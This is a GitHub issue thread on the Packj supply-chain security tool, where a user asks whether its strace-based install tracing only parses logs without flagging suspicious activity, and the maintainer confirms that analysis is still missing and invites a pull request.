search

ossillate-inc / packj

Packj stops :zap: Solarwinds-, ESLint-, and PyTorch-like attacks by flagging malicious/vulnerable open-source dependencies ("weak links") in your software supply-chain
https://packj.dev
GNU Affero General Public License v3.0
650 stars 36 forks source link

Analysis of the Tracing Log #87

Closed Co1lin closed 11 months ago

Co1lin commented 1 year ago

First, thanks for the amazing work!

I want to check my understanding of the current implementation of tracing. If we specify -t, the installation will be traced with strace -f -ttt -T -o strace.log <cmd>. Then the tracing log will be parsed by parse_trace_file. If the parsing succeed, an OK message would appear with a brief summary of syscalls.

To me, it seems that the tracing log is only "parsed", but not "analyzed". So if some suspicious activities are logged into the tracing log, it will still report an OK message. Then, a manual analysis of the tracing log is required to draw a conclusion of whether it is malicious or not. Is it correct?

BTW, the current version does not support tracing for local packages. I find it only requires a few lines of changes to support tracing local_nodejs:/path/to/pkg. Is there anyone working on this? I can propose a PR if needed.

ashishbijlani commented 11 months ago

Yes, your understanding is correct. More work is needed for analyzing parsed logs for suspicious activities. Feel free to submit a PR. Thanks!